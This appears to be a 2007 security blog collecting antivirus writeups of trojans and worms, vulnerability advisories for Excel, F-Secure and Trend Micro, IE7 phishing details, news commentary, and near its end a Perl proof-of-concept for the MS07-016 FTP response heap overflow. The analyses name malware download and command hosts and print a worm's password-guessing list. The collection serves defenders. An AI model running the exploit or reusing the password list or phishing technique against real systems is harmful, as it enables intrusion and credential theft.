\mensagem.exe. This file is not available at the time of writing.Labels: Microsoft, Trojan, Virus
Size: 11 kbytes (packed)
Discovered: 2007 Feb 14
SYMPTOMS:
- The presence of the following file: %WINDIR%\sqhos32.wmf
- The presence of the following registry key:
HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run: "lre"="%path_to_trojan%"
- A process named 'module.exe' running
TECHNICAL DESCRIPTION:
The trojan creates a file named sqhos32.wmf in %WINDIR% folder, file that contains some data the trojan uses. Then, it will create the following registry key in order to execute itself at each system startup:
HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run: "lre"="%path_to_trojan%"
The trojan tries to download a file named 'module.exe' from http://eased{...}.com/et.exe.
When the link becomes available, it will execute the downloaded file, delete the startup registry key and mark itself for deletion at the next system startup.
ANALYZED BY:
Marius Botis, virus researcher
Labels: Microsoft, Trojan, Worm
Microsoft Excel Long Palette Heap Overflow VulnerabilityI. BACKGROUND
Microsoft Excel is the spreadsheet application from the Microsoft Office System. More information is available at the following link:
http://office.microsoft.com/
II. DESCRIPTION
Remote exploitation of an heap-based buffer overflow vulnerability in Microsoft Corp.'s Excel spreadsheet application format could allow an attacker to execute arbitrary code in the context of the user who started Excel.
The vulnerability specifically exists in the handling of the PALETTE record in BIFF8 format spreadsheet files. By supplying a record with too many entries, an exploitable buffer overflow condition can occur.
III. ANALYSIS
Successful exploitation of this vulnerability would allow an attacker to execute arbitrary code in the context of the user who opened the document. In order exploit this vulnerability, an attacker would need to convince the target to open an Excel spreadsheet file. Likely attack vectors include sending the file as an attachment in an email or linking to the file on a website.
Systems with a default install of Office 2000 will open Office documents, including Excel spreadsheet files, from websites without prompting the user. This allows an attacker to exploit this vulnerability without user interaction beyond visiting a website. Later versions of Office will not open these documents automatically unless the user has chosen this behavior.
IV. DETECTION
iDefense Labs have confirmed the existence of this vulnerability in Microsoft Excel 2003 with all service packs and security updates. Previous versions of Excel are also likely to be affected.
V. WORKAROUND
Do not follow links or open files from unknown sources or that you were not expecting to receive.
VI. VENDOR RESPONSE
Microsoft has addressed this vulnerability with Microsoft Security Bulletin MS07-002. A link to this bulletin can be found below.
http://www.microsoft.com/technet/security/bulletin/ms07-002.mspx
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-0031 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.
VIII. DISCLOSURE TIMELINE
09/22/2006 Initial vendor notification
09/22/2006 Initial vendor response
01/09/2007 Coordinated public disclosure
IX. CREDIT
This vulnerability was discovered by Greg MacManus, iDefense Labs.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright © 2006 iDefense, Inc.
Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customer service for permission.
Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Labels: Microsoft, Vulnerability
Mar 19 2007 10:41AM
dh layereddefense com
=================================================
Layered Defense Research Advisory 18 March 2007
=================================================
1) Affected Software
F-Secure Anti-Virus Client Security Version 6.02
=================================================
2) Severity Rating:
Low risk
Impact: Local read write arbitrary memory, denial of service.
=================================================
3) Description of Vulnerability
A format string vulnerability was discovered within F-Secure Anti-Virus Client Security Version 6.02. The vulnerability is due to improper processing of format strings when processing Management Server name field. When special crafted format strings are entered into the Management Server name field under Communication settings an attacker can read/write arbitrary memory and at a minimum can cause a denial of service condition.
=================================================
4) Solution
Fix: http://support.f-secure.com/enu/corporate/downloads/hotfixes/av-cs-hotfi
xes.shtml
=================================================
5) Time Table:
11/20/2006 Reported Vulnerability to Vendor.
11/29/2007 Vendor acknowledged the vulnerability
03/01/2007 Vendor published hot fix
=================================================
6) Credits Discovered by Deral Heiland, www.LayeredDefense.com
=================================================
7) Reference
=================================================
8) About Layered Defense Layered Defense, Is a group of security professionals that work together on ethical Research, Testing and Training within the information security arena. http://www.layereddefense.com
=================================================
Labels: Anti-Virus, Microsoft, Vulnerability
W32.Zhosu@mmRisk Level 1: Very Low
Discovered: March 20, 2007
Updated: March 21, 2007 4:02:06 AM
Type: Worm
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP
W32.Zhosu@mm is a worm that spreads by sending itself to email addresses that it finds in the Windows Address Book.
Symantec Security Response is currently investigating this threat and will post more information as it becomes available.
Threat Assessment
Wild Level: Low
Number of Infections: 0 - 49
Number of Sites: 0 - 2
Geographical Distribution: Low
Threat Containment: Easy
Removal: Easy
Damage
Damage Level: Low
Distribution
Distribution Level: Low
Writeup By: Chen Yu
Labels: Microsoft, Virus, Worm
Trend Micro Antivirus UPX Parsing Kernel Divide by Zero VulnerabilityI. BACKGROUNDTrend Micro AntiVirus is an virus scanning engine included in a wide array of products by Trend Micro. Several examples of vulnerable products include PC-cillin and Internet Security Suite.
http://www.trendmicro.com/en/home/us/home.htm
II. DESCRIPTIONRemote exploitation of a divide by zero error in Trend Micro AntiVirus may allow attackers to cause a denial of service.
The vulnerability exists in the kernel driver, VsapiNT.sys. This driver is responsible for scanning various file formats for malicious content. The code that parses UPX files takes an integer value from an attacker supplied file and uses it as a divisor. This results in a divide by zero error in kernel mode. This causes a kernel fault resulting in a blue screen of death (BSOD).
III. ANALYSISExploitation of this vulnerability results not only in a DOS of the Trend Micro process, but in an operating system crash.
There are several different attack vectors depending on which product is being targeted. Someone targeting a home user would need to convince a user to download a file from a website or an attachment from an email message. The user would then need to manually scan this file or save it and have the Trend Micro auto scan process scan it at some later time. If instead a mail gateway is being targeted this vulnerability can be exploited automatically by sending a malicious attachment through a gateway that uses Trend Micro to scan content.
IV. DETECTIONiDefense has confirmed the existence of this vulnerability in Trend Micro AntiVirus version 14.10.1041, engine version 8.320.1003. Previous versions may also be affected.
V. WORKAROUNDiDefense is currently unaware of any workarounds for this issue.
VI. VENDOR RESPONSE"To address this vulnerability, Trend Micro recommends customers to update to Virus Pattern File 4.335.00 or higher."
For more information, consult the Trend Micro Knowledge Base article at the link shown below.
http://esupport.trendmicro.com/support/viewxml.do?ContentID=EN-1034587 VII. CVE INFORMATIONA Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet.
VIII. DISCLOSURE TIMELINE
02/27/2007 Initial vendor notification
02/27/2007 Initial vendor response
03/14/2007 Coordinated public disclosure
IX. CREDITThe discoverer of this vulnerability wishes to remain anonymous.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICESCopyright © 2007 iDefense, Inc.
Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customer service for permission.
Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Labels: Advisory, Anti-Virus, Microsoft, Vulnerability
Name Troj/Psychwa-S
Type Trojan
Affected operating systems Windows
Troj/Psychwa-S is a Trojan for the Windows platform.
Troj/Psychwa-S includes functionality to access the internet and communicate with a remote server via HTTP.
Labels: Anti-Virus, Microsoft, Trojan
Malware type: JavaScript
Aliases: No Alias Found
In the wild: Yes
Destructive: No
Language: English
Platform: Windows 98, ME, NT, 2000, XP, Server 2003, Mac OS X
Encrypted: No
Overall risk rating: Low
Reported infections: Low
Damage potential: High
Distribution potential: Low
Size of malware: 5,609 Bytes
Initial samples received on: Mar 16, 2007
Related to: TROJ_DLOADER.JHV
Payload 1: Steals information
Details:
This malicious JavaScript may be dropped by another malware. It may also be downloaded from the Internet, particularly by the malware TROJ_DLOADER.JHV.
It is used to steal information, such as login credentials, used in MySpace accounts. MySpace (www.myspace.com) is a popular social networking Web site that hosts profiles of users from all around the world.
This JavaScript uploads the stolen information to the URL http://BLOCKED}ofileawareness.com/logs4/connect.php. As a result, remote users may view and use the uploaded information for malicious purposes.
It runs on Mac OS X, Windows 98, ME, NT, 2000, XP, and Server 2003.
Analysis By: Carlo Panganiban
Labels: Anti-Virus, http, Microsoft, Trojan
An interesting analysis of the costs (to end users) of protecting (media companies) intellectual property from their customers.
This includes:
Disabling of Functionality
Decreased Playback Quality
Denial-of-Service via Driver/Device Revocation
Decreased System Reliability
Increased Hardware Costs
Unnecessary CPU Resource Consumption (to quote "In order to prevent active attacks, device drivers are required to poll the underlying hardware every 30ms for digital outputs and every 150 ms for analog ones to ensure that everything appears kosher. This means that even with nothing else happening in the system, a mass of assorted drivers has to wake up thirty times a second just to ensure that… nothing continues to happen (commenting on this mechanism, Leo Laporte in his Security Now podcast with Steve Gibson calls Vista “an operating system that is insanely paranoid”).
Unnecessary Device Resource Consumption
Read the entire
article here.
Labels: Microsoft, News Article
Name Troj/Singu-AQ
Type Spyware Trojan
Affected operating systems Windows
Side effects Steals information, Records keystrokes, Installs itself in the Registry, Installs a browser helper object
Troj/Singu-AQ is a password-stealing Trojan for the Windows platform.
When first run, Troj/Singu-AQ copies itself to
\gdien32.exe and creates the following files:
\lmrtend.dll
\shlapi.dll
lmrtend.dll is also detected as Troj/Singu-AQ
shlapi.dll contains logged keypresses
The Trojan creates the following registry entries in order to be run automatically:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
gdien32
\gdien32.exe
lmrtend.dll is installed as a BHO (browser helper object).Labels: Anti-Virus, Microsoft, Virus
As with any new Microsoft product, OneCare Anti-virus has problems. However the competition should not take this to mean that they can rest easy. Microsoft has the staying power and determination to develop their products into world beaters. Once MS has come into a market they will keep spending money until they dominate it.
Best quotes from this article:
"Usually Microsoft doesn't develop products, we buy products. It's not a bad product, but bits and pieces are missing,"
"OneCare is a new product — they shouldn't have rolled it out when they did, but they're fixing the problems now,"
"Microsoft is not a security company. Security is important, but it's just a little part of Microsoft,"
Ouch.
===================================
Microsoft: OneCare should not have been rolled outTom Espiner ZDNet UK
Published: 16 Mar 2007 13:03 GMT
Microsoft has said that its OneCare security suite has "a problem" with the underlying antivirus code, and admitted that security is just "a little part of Microsoft".
Speaking to ZDNet UK exclusively at the CeBIT show in Hanover, a senior manager for the software giant said that its consumer security product is far from perfect and that pieces are actually "missing".
OneCare has been dogged by controversy since its launch last May. Signs that the software was not up to scratch came earlier this month when OneCare failed to achieve certification in an independent test of security products. Shortly before that, it emerged that the product did not sufficiently protect users of Microsoft's Vista operating system against malware.
But the latest and most serious problems arose in March this year after the product mistakenly quarantined and even deleted Outlook and Outlook Express files for the second time.
Microsoft apologised for the problems and has issued an update that has now been automatically pushed out to OneCare customers, to halt the false positive identification as malware of Outlook .pst and Outlook Express .dbx files.
Asked about these problems, Arno Edelmann, Microsoft's European business security product manager, told ZDNet UK on Thursday that the code itself has pieces missing.
"Usually Microsoft doesn't develop products, we buy products. It's not a bad product, but bits and pieces are missing," said Edelmann.
The problem lies with a core technology of OneCare, the GeCAD antivirus code, and how it interacts with Microsoft mailservers. According to Edelmann, the Microsoft updates and mailserver infrastructure do not harmonise.
"It's a problem with the updates, and it's a problem with the implementation," said Edelmann.
If mail is received from a server running Exchange 2007, users are unlikely to encounter problems. However, if mail is received from servers running Exchange 2000 or 2003, the likelihood of quarantining is high, said Edelmann.
"OneCare is a new product — they shouldn't have rolled it out when they did, but they're fixing the problems now," said Edelmann.
According to the security manager, security is only a small part of what Microsoft does, suggesting it does not have as much security expertise as established security vendors.
"Microsoft is not a security company. Security is important, but it's just a little part of Microsoft," said Edelmann.
Security vendor Kaspersky said that it was not acceptable for two Microsoft products — such as OneCare and Exchange 2007 — to be incompatible, especially as Microsoft has market dominance.
"Microsoft, welcome to our business," said Eugene Kaspersky, the founder of the company. "All in all it's a bad thing. It's not acceptable for Microsoft products to do that. Microsoft dominates the market. If they do that it creates a big noise, many affected people, and happy lawyers."
This is not the first time Microsoft has had a problem with OneCare and Outlook. In January OneCare also erroneously quarantined Outlook files. However, Kaspersky said that although the problems then and now were the same, the cause of the problems in January was different.
"They fixed the first false positive, and now they have the next one," said Kaspersky.
Kaspersky said that false positives are not just a problem for Microsoft, but for the whole antivirus industry. He said that about 1 percent of Kaspersky records were false positives, but they were almost totally stopped by the company's test robots. He added, however, that sometimes false positives are released by Kaspersky.
Microsoft purchased the Romanian GeCAD company in 2003.
Labels: Anti-Virus, Microsoft, News Article
Phishing using IE7 local resource vulnerability
Summary
Internet Explorer 7.0 is vulnerable to cross-site scripting in one of its local resources. In combination with a design flaw in this specific local resource it is possible for an attacker to easily conduct phishing attacks against IE7 users.
Affected versions
• Windows Vista - Internet Explorer 7.0
• Windows XP - Internet Explorer 7.0
Technical Details
The navcancl.htm local resource is used by the browser when for some reason a navigation to a specific page is canceled.
When a navigation is canceled the URL of the specific page is provided to the navcancl.htm local resource after the # sign. For example: res://ieframe.dll/navcancl.htm#http://www.site.com. The navcancl.htm page then generates a script in the “Refresh the page.” link in order to reload the provided site again when the user clicks on this link.
It is possible to inject a script in the provided link which will be executed when the user clicks on the “Refresh the page.” link.
Luckily, Internet Explorer now runs most of its local resources (including navcancl.htm) in “Internet Zone”, so this vulnerability cannot be exploited to conduct a remote code execution.
Unfortunately, there is also a design flaw in IE7. The browser automatically removes the URL path of the local resource and leaves only the provided URL. For example: when the user visits res://ieframe.dll/navcancl.htm#http://www.site.com, IE7 will show http://www.site.com in the address bar.
To perform a phishing attack, an attacker can create a specially crafted navcancl.htm local resource link with a script that will display a fake content of a trusted site (e.g. bank, paypal, MySpace).
When the victim will open the link that was sent by the attacker, a “Navigation Canceled” page will be displayed. The victim will think that there was an error in the site or some kind of a network error and will try to refresh the page. Once he will click on the “Refresh the page.” link, The attacker’s provided content (e.g. fake login page) will be displayed and the victim will think that he’s within the trusted site, because the address bar shows the trusted site’s URL.
Proof-of-Concept
A CNN.com article spoofing proof-of-concept can be found here.
If you are not using IE7, you can watch a demonstration video here.
Workaround / Suggestion
Until Microsoft fixes this vulnerability, do not trust the “Navigation Canceled” page!
Labels: Exploit, http, Microsoft, Vulnerability
W32.Fujacks.BH W32/Catcher-A
Discovered: March 14, 2007
Also Known As: W32/Fujacks.z [McAfee], W32/Fujacks.dll [McAfee]
Type: Virus, Worm
Infection Length: 80,384 bytes
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP
Once executed, the worm copies itself as the following files:
%System%\[RANDOM].dll
%System%\[RANDOM].exe
The worm creates the following registry entry so that it runs every time Windows starts:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{21LYYSYS-9421-2126-L2Y1-L2Y1Y1S3Y1S4}\"StubPath" = "%System%\[RANDOM].exe"
The worm injects itself into the following processes:
Explorer.exe
Services.exe
Winlogon.exe
The worm attempts to download a file from the following URL:
[http://]www.lovesa.info/logo[REMOVED]
Note: At the time of writing, the file was unavailable.
The worm scans the compromised computer and prepends itself to .exe and .scr files. It avoids infecting files located in the following folders:
ComPlus Applications
Common Files
Delphi
Internet Explorer
Messenger
Microsoft Frontpage
Movie Maker
NetMeeting
Online Services
Outlook Express
RECYCLER
System Volume Information
System32
Temp
WINNT
WIndows Media Player
WIndows NT
WinRAR
Windows
Note: Executable files increase in size by 80,384 bytes.
The worm also appends a reference to the domain www.lovesa.info into all files it finds with the following extensions:
.asa
.asp
.aspx
.bat
.cdx
.cer
.css
.htm
.html
.inc
.jsp
.php
Uses the following list of passwords in attempt to copy itself to available network shares:
000000
00000000
1
110
111
111111
11111111
12
120
121212
123
123123
123321
1234
12345
123456
1234567
12345678
123456789
1234qwer
123abc
123asd
123qwe
2000
2004
2005
2006
2007
2008
2k
321
4321
5021314
520
5201314
520520
54321
654321
88888
88888888
999999
Admin
Administrator
Password
Root
abc
abc123
abcd
abcd123
admin
admin123
administrator
adsl
asdf
asdf123
bye
byebye
cctv
china
computer
data
database
date
enable
foobar
fuck
fuckyou
ghost
god
godblessyou
goodbye
guest
guest123
guest321
hao123
happy
home
ihavenopass
iloveyou
internet
japan
kaonima
live
login
love
loveyou
mylove
mypass
mypass123
no
oracle
pass
passwd
password
pwd
qq
qwer
root
sa
server
sex
super
sybase
temp
temp123
test
test123
user
users
wangba
window
windows
windows2000
windows2003
windowsxp.
xp
xxx
yxcv
zxcv
The worm then attempts to copy itself as one of the following filenames:
FuckJacks.exe
Logo1_.exe
Logo_1.exe
Rundl132.exe
c0nime.exe
iexpl0re.exe
nvscv32.exe
spoclsv.exe
svch0st.exe
Threat AssessmentWild Level: Low
Number of Infections: 0 - 49
Number of Sites: 0 - 2
Geographical Distribution: Low
Threat Containment: Easy
Removal: Moderate
Damage
Damage Level: Medium
Payload: Infects various files.
Distribution
Distribution Level: Medium
Shared Drives: Copies itself to network shares.
Writeup By: Jeong Mun
Labels: Anti-Virus, Microsoft, Worm
Malware type: JavaScript
Aliases: No Alias Found
In the wild: Yes
Destructive: No
Language: English
Platform: Windows 98, ME, NT, 2000, XP, Server 2003
Encrypted: No
Overall risk rating: Low
Reported infections: Low
Damage potential: High
Distribution potential: High
Malware Overview
This malicious JavaScript is usually embedded in a malicious Web site and is run on a system when a user visits the said Web site. It may also arrive on a system as an attachment to a mass-mailed email message.
Upon execution, it decodes and drops a file detected by Trend Micro as WORM_FEEBS.OV. As a result, routines of the related worm may be exhibited on the affected system.
It also displays a fake loading page that displays the following message:
Error while decrypting file
Solution:
(Note: Close all instances of Internet Explorer before proceeding with the solution below.)
Important Windows ME/XP Cleaning InstructionsUsers running Windows ME and XP must disable System Restore to allow full scanning of infected computers.
Users running other Windows versions can proceed with the succeeding solution set(s).
Running Trend Micro Antivirus
If you are currently running in safe mode, please restart your computer normally before performing the following solution.
Scan your computer with Trend Micro antivirus and delete files detected as JS_FEEBS.JM and WORM_FEEBS.OV. To do this, Trend Micro customers must download the latest virus pattern file and scan their computer. Other Internet users can use HouseCall, the Trend Micro online virus scanner.
Labels: http, Microsoft, Virus
Win32/Nirbot Family
Threat AssessmentOverall Risk: Low
Wild: Low
Destructiveness: Medium
Pervasiveness: Medium
Characteristics
Type: Worm
Category: Win32
Also known as
W32/Delbot (Sophos),
W32.Rinbot (Symantec), Backdoor.Win32.VanBot (Kaspersky)
Description Win32/Nirbot is a family of IRC-controlled backdoors that can be used to gain unauthorized access to a victim's machine. They can also exhibit worm-like functionality by exploiting many different software vulnerabilities, including SYM06-010 and MS06-040.
Method of Infection When executed, Win32/Nirbot copies itself to the %System% directory using filenames such as:
arman.exe
atievx.exe
crcss.exe
lemsrv.exe
msync.exe
navscnr.exe
netadp.exe
prevx.exe
rinsv.exe
symmec.exe
It then makes the following registry modification to ensure this copy is executed at each Windows start:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
= ""
where differs depending on the variant, for example:
ATI Active Graphics Card Monitor
JW Manager
LEMSRV
Network Bridge
Random Interface Network Manager
Symmetrical Network
Syncronization
Nirbot continuously checks for and sets the above registry entry.
The worm also creates a mutex to avoid running multiple instances of itself.
Note: '%System%' is a variable location. The malware determines the location of the current System folder by querying the operating system. The default installation location for the System directory for Windows 2000 and NT is C:\Winnt\System32; for 95,98 and ME is C:\Windows\System; and for XP is C:\Windows\System32.
Method of Distribution
Via Exploit
Win32/Nirbot spreads by exploiting a number of vulnerabilities in Windows operating systems and third party applications. Nirbot's spreading routine starts with scanning for vulnerable target machines. The worm can generate random values for all or part of each IP address it targets.
Nirbot variants can spread by exploiting the following vulnerabilites: Symantec Client Security and Symantec AntiVirus Elevation of Privilege (SYM06-010)
The worm opens a configurable port on the compromised machine and runs a TFTP server. The worm probes remote machines on port 2967 to determine if they are prone to the SYM06-010 vulnerability. If successful, the worm executes a small amount of code on the target machine that instructs it to connect back to the running TFTP server and retrieve a copy of the worm.
For more information on this vulnerability, please visit the following:
http://www.symantec.com/avcenter/security/Content/2006.05.25.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2630
Microsoft Windows Server service buffer overflow vulnerability (TCP port 139)
The worm creates an HTTP server on the system on a random port. The worm also checks if the IP address of the local machine partially matches a list of IPs contained in its code, for example:
192.168.*.*
10.*.*.*
111.*.*.*
15.*.*.*
16.*.*.*
101.*.*.*
110.*.*.*
112.*.*.*
170.65.*.*
If the IP does not match, the worm instructs the machine vulnerable to this exploit to connect back to the HTTP server running on the system and retrieve a copy of the worm. If the IPs do match, the worm executes a small amount of code on the targeted machine that instructs it to download a copy of the worm from a specific domain. The following is a list of domains and IPs that Nirbot variants have been observed to download from:
66.29.116.82
58.20.109.39
digiflex.info
t3arj3rk.com
sw1tchbck.net
pennysheet.com
jimmybuttons.com
For more information on this vulnerability, please visit the following:
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34486
http://www.microsoft.com/technet/security/Bulletin/MS06-040.mspx
Microsoft Windows RPCSS malformed DCOM message buffer overflow vulnerabilities (TCP port 135)
If the worm finds a machine vulnerable to this exploit, it executes a small amount of code on the targeted machine that instructs it to retrieve a copy of the worm. This is also done through a TFTP server the worm creates on the compromised system on a configurable port.
For more information on this vulnerability, please visit the following:
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=25975
http://www.microsoft.com/technet/security/bulletin/MS03-039.mspx
Exploiting weak passwords on MS SQL servers, including the Microsoft SQL Server Desktop Engine blank 'sa' password vulnerability (TCP port 1433)
If Win32/Nirbot finds an exploitable machine, it attempts to log into SQL server accounts 'sa', 'root' and 'admin'. It attempts to authenticate these accounts using several passwords stored in its code. If the worm successfully logs into an account, it sends code to the remote machine instructing it to retrieve a copy of itself.
For more information on this vulnerability, please visit the following:
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=5705
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q321081
Payload: Backdoor Functionality
Nirbot is an IRC-controlled backdoor. Variants of the worm usually attempt to connect to between two to four IRC servers before joining a specific channel. The following is a list of some known IRC servers Nirbot variants have attempted connection to (generally on port 8080, however this differs between variants):
crusade.godhatesfags.com
is.wayne.brady.gonna.have.to.chokeabitch.us
lol.godhatesfags.com
phatcamp.org
x.anti-viral.us
x.pennysheet.com
x.rofflewaffles.us
When the worm connects to one of these servers and joins a channel, it then has control of the compromised machine. Once the victim's computer is under control, the overseer is able to instruct Nirbot to attempt to perform malicious operations such as spreading.
Via its backdoor, the trojan can also be instructed to:
- Retrieve system information such as operating system details
- Download and execute files from the Internet
- Run a SOCKS proxy on the affected host
- Perform a Denial of Service attack
- Execute commands on the affected host
- Update itself
- Remove itself
- Steal CD keys
- Downloads and Executes Arbitrary Files
When first run, some Nirbot variants download and execute a file. The file is downloaded from a specific domain and is usually executed from the C:\ directory. Downloaded files are usually Win32/Amahkey trojan variants - for example, Win32/Amahkey.F.
Analysis by Amir FoudaLabels: Anti-Virus, Microsoft, Virus, Worm
Troj/IMspam-B is a Trojan for the Windows platform.
Name Troj/IMspam-B
Type Trojan
Affected operating systems Windows
Side effects Forges the sender's email address. Uses its own emailing engine. Downloads code from the internet
Troj/IMspam-B is a mass spamming tool that targets MSN Messenger, Windows Live Messenger, AOL Instant Messenger and email addresses.
When run Troj/IMspam-B closes all other instances of itself and removes all EXEs in the root folder of the C drive.
Sample text appears as:
"Heeey i saw a pic of u online HAHAHA check
"
At the time of writing, the EXE downloaded from the malicious link is detected as W32/Delbot-U.Labels: Anti-Virus, Microsoft, Trojan, Virus
W32.MessmultiRisk Level 1: Very Low
Discovered: March 12, 2007
Type: Worm
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XP
W32.Messmulti is a worm that sends a link to itself through multiple instant messengers or chat programs.
Threat Assessment
Wild
Wild Level: Low
Number of Infections: 0 - 49
Number of Sites: 0 - 2
Geographical Distribution: Low
Threat Containment: Easy
Removal: Easy
Damage
Damage Level: Low
Payload: Sends a link to itself through multiple instant messengers or chat programs.
Distribution
Distribution Level: Low
Writeup By: Masaki Suenaga
Labels: Microsoft, Worm
Name Troj/DownLdr-QP
Type Trojan
Affected operating systems Windows
Side effects Downloads code from the internet
Aliases Trojan-Downloader.Win32.Delf.yj
Troj/DownLdr-QP includes functionality to access the internet and communicate
with a remote server via HTTP.
When first run Troj/DownLdr-QP copies itself to:
\niw.exe
\impai.exe
and creates the following files:
\Content.IE5\89irkl2n\cd321[1].htm
\Content.IE5\od6fwfox\677977[1].htm
These files may be deleted.Labels: Microsoft, Virus
Brian Krebs on Computer Security
Online Anti-Virus Scans: A Free Second OpinionPeriodic online virus scanning is a good idea for Windows users, even for people already using up-to-date anti-virus tools. There are a couple of reasons I suggest this: First, anti-virus software is frequently slow to spot new threats. Take a gander at the daily "unrecognized" stats posted by
Shadowserver.org, which tracks the performance (or lack thereof) of several popular tools in spotting new variants. That list currently examines the performance of several free programs, but the reality is not much different with the commercial tools. Just have a look at performance metrics and virus detection failure rates chronicled
here (virustotal.com) and
here.
The second reason follows from the first: If something nasty does make it past your security defenses, usually the first thing it will try to do is disable the active protection and update features in those tools. In such cases, you probably would not know about the infection unless you turned to a third-party program that is not already installed on your computer.
In my experience, two of the better free online anti-virus scanners are Panda Software's
PandaScan and Kaspersky Lab's
Free Virus Scan. Both require that you run the scans using Internet Explorer, as both require the installation of an ActiveX plug-in to do the job.
F-Secure Corp.,
CA and
BitDefender also offer free online scanners that also use IE and ActiveX, but I haven't yet tried those so I can't offer an opinion on them.
TrendMicro's
HouseCall service lets you install and run a free scanning tool from inside an IE or Firefox browser. However, I found the program both annoying -- it emitted a series of very loud and startling tones through my computer speakers while downloading virus definitions -- and ineffective. It crashed halfway through the scan, taking all of my other open Firefox windows with it, including an earlier, unsaved version of this blog post. (I had hoped Firefox 2.0's crash-recovery feature would save what I had typed as it had in previous crashes, but no such luck this time.)
If you have just a single file or archive that you'd like to scan, I'd suggest submitting it to
VirusTotal, a free online anti-virus engine that will scan your submission against more than two dozen of the most well-known tools.
Depending on the speed of your PC and the number of files and hard drives you have, conducting an online scan can take between a few minutes to several hours to complete. It's not a bad idea to run the scan only when you can afford to be away from the PC for a few hours, or perhaps right before bedtime. Even on my test machine -- which sports a 2.2 GHz processor and 2 gigabytes of memory -- running several of the online scanners interfered with the simplest of tasks, such as composing an e-mail.
Labels: Microsoft, Virus
Proof of concept code for MS FTP Server Response vulnerability.
===============================
#!/usr/bin/perl
# MS 07-016 FTP Server Response PoC
# Usage: ./ms07016ftp.pl [LISTEN_IP]
#
# Tested Against: MSIE 6.02900.2180 (SP2)
#
# Details: The response is broken into buffers, either at length 1024,
# or at '\r\n'. Each buffer is apended with \x00, without
# bounds checking. If the response is exctly 1024 characters
# in length, you will overflow the heap with the string \x00.
use IO::Socket;
use strict;
# Create listener
my $ip=shift || '127.0.0.1';
my $sock = IO::Socket::INET->new(Listen=>1,
LocalHost=>$ip,
LocalPort=>'21',
Proto=>'tcp');
$sock or die ("Could not create listener.\nMake sure no FTP server is running, and you are running this as root.\n");
# Wait for initial connection and send banner
my $sock_in = $sock->accept();
print $sock_in "220 waa waa wee waa\r\n";
# Send response code with total lenght of response = 1024
while (<$sock_in>){
my $response;
if($_ eq "USER") { $response="331 ";}
elsif($_ eq "PASS") { $response="230 ";}
elsif($_ eq "syst") { $response="215 ";}
elsif($_ eq "CWD") { $response="250 ";}
elsif($_ eq "PWD") { $response="230 ";}
else { $response="200 ";}
print $sock_in $response."A"x(1024-length($response)-2)."\r\n";
}
close($sock);
# milw0rm.com [2007-03-09]
Labels: Exploit, Microsoft
An interesting article from the BBC, however the author misses the easiest way, which is to stop using Windows. If you must use Windows then it is possible to make Windows more secure than it is by default. This stops many malware attacks.
========================================================================